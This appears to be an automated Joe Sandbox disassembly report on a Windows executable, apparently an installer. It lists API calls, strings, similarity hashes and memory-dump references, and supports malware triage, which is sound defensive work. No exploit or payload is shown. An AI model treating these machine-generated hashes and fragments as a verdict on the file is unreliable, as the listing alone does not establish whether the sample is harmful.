  • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
Strings
Similarity
• API ID: InfoLocale$DefaultSystem
• String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
• API String ID: 1044490935-665933166
• Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
• Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
• Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
• Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
APIs
• GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
• InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
  • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
• InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
  • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
• InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
Strings
Similarity
• API ID: Menu$Insert$Create$ItemPopupVersion
• String ID: ,$?
• API String ID: 2359071979-2308483597
• Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
• Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
• Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
• Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
APIs
• GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
• GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
• GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
• GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
• DeleteObject.GDI32(?), ref: 0041BF9F
• DeleteObject.GDI32(?), ref: 0041BFA8
• CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
Similarity
• API ID: Object$BitmapBitsDelete$CreateIcon
• String ID:
• API String ID: 1030595962-0
• Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
• Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
• Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
• Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
APIs
• SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
• GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
• SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
• RealizePalette.GDI32(?), ref: 0041CF92
• StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
• StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
• SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
Similarity
• API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
• String ID:
• API String ID: 2222416421-0
• Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
• Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
• Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
• Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
APIs
• SendMessageA.USER32(00000000,?,?), ref: 0045732E
  • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
• TranslateMessage.USER32(?), ref: 004573B3
• DispatchMessageA.USER32(?), ref: 004573BC
Strings
                                                                                                    Similarity
                                                                                                    • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                                    • String ID: [Paused]
                                                                                                    • API String ID: 1007367021-4230553315
                                                                                                    • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                    • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                                    • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                    • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                                    APIs
                                                                                                    • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                                    • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                                    • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                                    • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$LoadSleep
                                                                                                    • String ID: CheckPassword
                                                                                                    • API String ID: 4023313301-1302249611
                                                                                                    • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                                    • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                                    • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                                    • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                                    APIs
                                                                                                      • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                                      • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                                      • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                                    • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                                    • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                                    • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                                    • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                                    Strings
                                                                                                    • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                                    • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                                    • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                                    • API String ID: 613034392-3771334282
                                                                                                    • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                                    • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                                    • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                                    • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                                                                    Strings
                                                                                                    • Fusion.dll, xrefs: 004597DF
                                                                                                    • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                                    • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                                    • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                                    • CreateAssemblyCache, xrefs: 00459836
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                                    • API String ID: 190572456-3990135632
                                                                                                    • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                                    • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                                    • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                                    • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                                    • GetFocus.USER32 ref: 0041C168
                                                                                                    • GetDC.USER32(?), ref: 0041C174
                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                                    • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                                    • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                                    Similarity
                                                                                                    • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3303097818-0
                                                                                                    • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                                    • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                                    • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                                    • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                                    • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                                    • 6FB62980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                                      • Part of subcall function 004107F8: 6FB5C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                                    • 6FBCCB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                                    • 6FBCC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                                    • 6FBCCB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                                    • 6FB60860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$B60860B62980C400C740
                                                                                                    • String ID:
                                                                                                    • API String ID: 2995079530-0
                                                                                                    • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                    • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                                    • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                    • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                                    • API String ID: 47109696-2530820420
                                                                                                    • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                                    • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                                    • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                                    • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                                    APIs
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                                    • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                                    • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$Delete$Stretch
                                                                                                    • String ID:
                                                                                                    • API String ID: 1458357782-0
APIs
• GetDC.USER32(00000000), ref: 00495519
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(00000000,00000000), ref: 0049553B
• GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
• GetTextMetricsA.GDI32(00000000,?), ref: 00495571
• ReleaseDC.USER32(00000000,00000000), ref: 0049558E
Strings
• ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Similarity
• API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
• String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
• API String ID: 2948443157-222967699
APIs
• GetCursorPos.USER32 ref: 004233AF
• WindowFromPoint.USER32(?,?), ref: 004233BC
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
• GetCurrentThreadId.KERNEL32 ref: 004233D1
• SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
• SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
• SetCursor.USER32(00000000), ref: 00423413
Similarity
• API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
• String ID:
• API String ID: 1770779139-0
APIs
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
• API String ID: 667068680-2254406584
APIs
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
Similarity
• API ID: AddressProc
• String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
• API String ID: 190572456-212574377
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
• InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
  • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
  • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
  • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
• ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
• String ID: ChangeWindowMessageFilterEx$user32.dll
• API String ID: 142928637-2676053874
APIs
• LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
• GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
• GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
• API String ID: 2238633743-1050967733
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
• GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
• GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
Similarity
• API ID: AddressProc$HandleModule
• String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
• API String ID: 667068680-222143506
APIs
• GetFocus.USER32 ref: 0041B57E
• GetDC.USER32(?), ref: 0041B58A
• GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
• GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
• GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
• ReleaseDC.USER32(?,?), ref: 0041B626
Similarity
• API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
• String ID:
• API String ID: 2502006586-0
APIs
• SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
• SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast
• String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
• API String ID: 1452528299-1580325520
APIs
• GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
• GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
• GetDC.USER32(00000000), ref: 0041BDE9
• GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
• ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CapsDeviceMetricsSystem$Release
• String ID:
• API String ID: 447804332-0
APIs
• RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
• LocalFree.KERNEL32(0078E4D0,00000000,00401B68), ref: 00401ACF
• VirtualFree.KERNEL32(?,00000000,00008000,0078E4D0,00000000,00401B68), ref: 00401AEE
• LocalFree.KERNEL32(0078F4D0,?,00000000,00008000,0078E4D0,00000000,00401B68), ref: 00401B2D
• RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
• RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
• String ID:
• API String ID: 3782394904-0
APIs
• GetWindowLongA.USER32(?,000000EC), ref: 0047E766
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
• GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
• SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
• ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$Long$Show
• String ID:
• API String ID: 3609083571-0
APIs
  • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
• UnrealizeObject.GDI32(00000000), ref: 0041B27C
• SelectObject.GDI32(?,00000000), ref: 0041B28E
• SetBkColor.GDI32(?,00000000), ref: 0041B2B1
• SetBkMode.GDI32(?,00000002), ref: 0041B2BC
• SetBkColor.GDI32(?,00000000), ref: 0041B2D7
• SetBkMode.GDI32(?,00000001), ref: 0041B2E2
  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
• String ID:
• API String ID: 3527656728-0
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseCreateFileHandle
• String ID: !nI$.tmp$_iu
• API String ID: 3498533004-584216493
APIs
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
  • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
• String ID: .dat$.msg$IMsg$Uninstall
• API String ID: 3312786188-1660910688
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressByteCharHandleModuleMultiProcWide
• String ID: ShutdownBlockReasonCreate$user32.dll
• API String ID: 828529508-2866557904
                                                                                                    APIs
                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                                    • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                                    • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                                    • API String ID: 2573145106-3235461205
                                                                                                    • Opcode ID: 0165f3f1031fc1aa6e60b3a9799ba1014783226e14f241c311df118ccfede771
                                                                                                    • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                                    • Opcode Fuzzy Hash: 0165f3f1031fc1aa6e60b3a9799ba1014783226e14f241c311df118ccfede771
                                                                                                    • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                                    • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                    • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                                    • API String ID: 3478007392-2498399450
                                                                                                    • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                                    • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                                    • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                                    • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                                    APIs
                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
